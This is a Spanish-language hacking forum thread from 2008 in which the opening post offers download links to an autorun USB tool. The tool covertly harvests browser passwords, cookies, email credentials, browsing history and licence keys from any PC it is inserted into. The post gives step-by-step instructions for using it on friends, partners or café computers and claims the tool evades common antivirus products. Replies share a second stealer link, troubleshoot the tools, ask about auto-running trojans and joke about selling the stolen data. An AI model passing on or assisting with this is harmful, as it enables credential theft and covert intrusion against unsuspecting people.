elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 15:44  

Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  Hacking with USB
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Hacking with USB  (Leído 23,972 veces)
H4T3 M3

Desconectado Desconectado

Ver Perfil
Hacking with USB
« en: 11 Marzo 2008, 05:10 »

Hacking with USB

Este programa roba toda clase de contraseñas e informacion confidencial de la PC en la que insertes tu USB, esto lo logra mediante un archivo autorun que ejecuta varias miniutilidades que tiene el programa entre otras lo que te puede ayudar a conseguir este programa es:

* Toda clase de contraseñas del navegador web hi5, myspace, e incluso de foros...
    * Historial de navegacion completo.
    * Clientes de correo tales como msn, yahoo, gmail y demás.
    * Licencias de los programas y mucho más.

Al descomprimir es detectado como codigo peligroso, no alarmarse.

Link De Descargar:  http://www.gigasize.com/get.php?d=dooy25nkb7c    :://:: 530 KB
Password:  http://phreackersworld.phpnet.us

H4T3 M3   :2:

Aqui una breve explicacion del Funcionamiento

Hacking Hotmail, MySpace, Hi5 y demás…

(By ChukNorris¬¬!)

Este  programa  realmente  hace  lo  que  promete  roba  toda  clase  de  contraseñas  e  información confidencial  de  la  PC  en  la  que  insertes  tu  USB,  esto  lo  logra  mediante  un  archivo  autorun  que ejecuta varias mini utilidades que tiene el programa  entre otras lo que te puede ayudar a conseguir este programa es:
-   Toda clase de contraseñas del navegador web hi-5, myspace, e incluso de foros.
-   Historial de navegación completo (para darte cuenta del perfil de la víctima y o amiga)
-   Cookies esto sabrán mis amigos más experimentados para lo que sirve.
-   Los clientes de correo tales como msn, yahoo, gmail y demás.
-   Toda la información de su hardware e IPs
-   Los puertos abiertos recientemente.
-   Licencias de los programas que tiene (incluidos Windows, Adobe y demás) Probado con:
-   Avast
-   Nod32
-   AVG Antivirus
-   Norton

¿Cómo usarlo?

1.    Descargas el archivo lo descomprimes y cortas todos los archivos que están dentro de la carpeta
Hack. Luego abres tu USB y pegas los 5 quedándote así:

También  puedes  meter  otros  archivos  en  la  USB  o  ponerlos  como  archivos  ocultos  para  no levantar sospechas.
2.    Una  vez  preparado  con  tu  USB  llegas  a  cualquier  Cyber  o  casa  de  un  “amigo”  o  “novia”  o cualquier  víctima  que  le  traigas  ganas  y  bajo  cualquier  pretexto  le  insertas  la  USB  esperas  10 segundos aprox. o más y la sacas.
OJO:  Nunca  abras  ninguna  de  las  5  carpetas,  de  lo  contrario  te  mandará  un  mensaje  de detección el antivirus así que mejor déjalo así.

3.    Llegas  tranquilamente  a  tu  PC  y  revisas  la  carpeta  de  tu  USB  llamada  'Dump'  observarás  una carpeta con el nombre de la PC víctima y dentro de ella ordenaditos varios archivos .html revisas
los archivos y verás lo que tienes a tu disposición

Exploremos una carpeta omitiendo las contraseñas y parte del correo por razones obvias…

Lo que tenía la víctima de contraseñas…

NOTA:  Al  momento  de  descargar  y  descomprimir  te  lo  marcará  como  archivo  peligroso  es  natural pues tiene el autorun pero no te preocupes no es peligroso para ti...

Aqui les dejo el link http://www.gigasize.com/get.php/3196680313/Hacking_with_USB.rar
ni0x

Ver Perfil
Re: Hacking with USB
« Respuesta #1 en: 11 Marzo 2008, 11:43 »

Esto ya estaba puesto:
http://foro.elhacker.net/index.php/topic,167050.0.html

Raz!el

Que miras aqui?.. el mensaje esta alla --->>

Ver Perfil
« Respuesta #2 en: 11 Marzo 2008, 15:34 »

No es el mismo programa!  ;)
ni0x

Ver Perfil
« Respuesta #3 en: 11 Marzo 2008, 15:39 »

Los dos hacen la misma funcion.

ohk

Some times I think i'm crazy, I'm crazy o so crazy

Ver Perfil WWW
« Respuesta #4 en: 11 Marzo 2008, 17:06 »

Y es que a veces pienso, que si no estubiera loco, no podría salir adelante.
madeinjaes

madeinjaes

Ver Perfil
« Respuesta #5 en: 11 Marzo 2008, 20:22 »

Gracias , lo usare para fines educativos  :rolleyes: ^^silvando^^
Tengo un uso muy bueno para este programa y no es enxufarlo en el pc de una xica.

Pd:haber por cuanto vendo la infomacion.ups... era broma (pense escribiendo)

http://bux.to/#r=mygmiljavi  gana dinero por clicks no es dinero gratis , tu lo ganas haciendo cliks si no quieres que yo sea tu referente seras vendido sin darte cuenta por menos de 2 euros y todo lo que ganes sin tu perder nada ira a otra persona.
~Yey~

Ver Perfil
« Respuesta #6 en: 11 Marzo 2008, 20:37 »

:xD :xD :xD y que mas da que hagan la misma función??tambien tienen la misma función el explorer y el mozilla y no es lo mismo usar uno que otro... :xD
graicas por el aporte

Blog
‭lipman

Ver Perfil WWW
« Respuesta #7 en: 11 Marzo 2008, 21:41 »

Contraseñas del Mozilla y del IE no me saca nada xD, solo los nombres de usuario =P

Y en el vista no va...

Saludos

Twitter: jmlipman

http://delanover.com

Busco redactores para mi blog.
ni0x

Ver Perfil
« Respuesta #8 en: 11 Marzo 2008, 21:48 »

Contraseñas del Mozilla y del IE no me saca nada xD, solo los nombres de usuario =P

Y en el vista no va...

Saludos

Acabo de subir uno que probe en winXP y Vista y finciona perfectamente, te dice hasta los puertos que tiene abiertos la PC.

http://rapidshare.com/files/91142151/usb_robadatos.rar

Para mi el mejor...

‭lipman

Ver Perfil WWW
« Respuesta #9 en: 11 Marzo 2008, 22:00 »

Vale.. ya me he dado cuenta de porque en vista no me funciona... es que tengo configurado de que lo habra directamente como una carpeta, y si.. los puertos los dice, pero las contraseñas del firefox no, y los nombres de usuarios tampoco, solo los del IE y en este no salen las contraseñas tampoco xD o por lo menos a mi.

A alguien les salen? =P

Saludos

Twitter: jmlipman

http://delanover.com

Busco redactores para mi blog.
ni0x

Ver Perfil
« Respuesta #10 en: 11 Marzo 2008, 22:07 »

el que puse yo me dice todas las contraseñas de la PC: Las de firefox, las del IE, los serials de los programas instalados, incluso el serial de windows, contraseñas de msn, yahoo, puertos que hay abiertos, usuarios del pc................ Y muchas mas.

Er_Borjita

Ver Perfil
« Respuesta #11 en: 12 Marzo 2008, 10:03 »

muy bueno por lo que he leido, me vendria de perlas pero te expongo una  duda.
 EL Pc del trabajo tiene capao asta los puertos USB, si lo meto me pide un usuario administrador,y su contraseña, asik no me valdria noh?¿
R.0.R

R.0.R.

Ver Perfil
« Respuesta #12 en: 17 Marzo 2008, 23:12 »

:xD :xD :xD y que mas da que hagan la misma función??tambien tienen la misma función el explorer y el mozilla y no es lo mismo usar uno que otro... :xD
graicas por el aporte

En fin no es para decir lo mismo varias veces, esto es solo deayuda y del HACKING USB es buen programa aunque no ahi como desarrolar uno tu mismo con lenguaje, aprendan a usar lenguajes :-\
Jalyoy

Ver Perfil
« Respuesta #13 en: 20 Marzo 2008, 01:22 »

se sabe si seria posible robar archivos que esten en localizaciones extandar?? (conversaciones de msn, mis documentos.. etc)

Tambien seria interesante poder ejecutar algun servidor de troyano automaticamente.
NadiceJMA

Nca

Ver Perfil
« Respuesta #14 en: 20 Marzo 2008, 01:29 »

el mismo programa lo habia posteado hace tiempo en el foro, pero lo borraron porque habria demasiados lammers que lo van a querer,

segun yo es preferible que lo quiten, o que el link del usb hack, lo pasen por pm.

para convatir contra los lammers.....
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a: